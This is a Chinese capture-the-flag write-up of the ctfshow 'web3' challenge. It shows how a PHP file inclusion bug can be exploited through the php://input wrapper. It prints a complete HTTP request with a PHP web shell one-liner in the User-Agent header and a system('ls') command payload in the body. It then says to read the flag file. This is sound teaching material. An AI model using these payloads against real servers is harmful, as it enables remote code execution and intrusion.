0x00 前言
- CTF 加解密合集
- CTF Web合集
0x01 题目
0x02 Write Up
这个题目一看就知道是一个文件包含漏洞
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。
GET http://3afc5257-7b7d-4917-a1eb-5ea59fc35d8c.challenge.ctf.show/?url=php://input HTTP/1.1
Host: 3afc5257-7b7d-4917-a1eb-5ea59fc35d8c.challenge.ctf.show
Upgrade-Insecure-Requests: 1
User-Agent: <?php @eval($_POST["s"])?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 20
<?php system('ls')?>
所以就可以直接执行命令
发现一个ctf_go_go_go的文件,然后读取就是了
文章来源:https://www.toymoban.com/news/detail-611235.html
以上文章来源地址https://www.toymoban.com/news/detail-611235.html
到了这里,关于ctfshow-web3的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!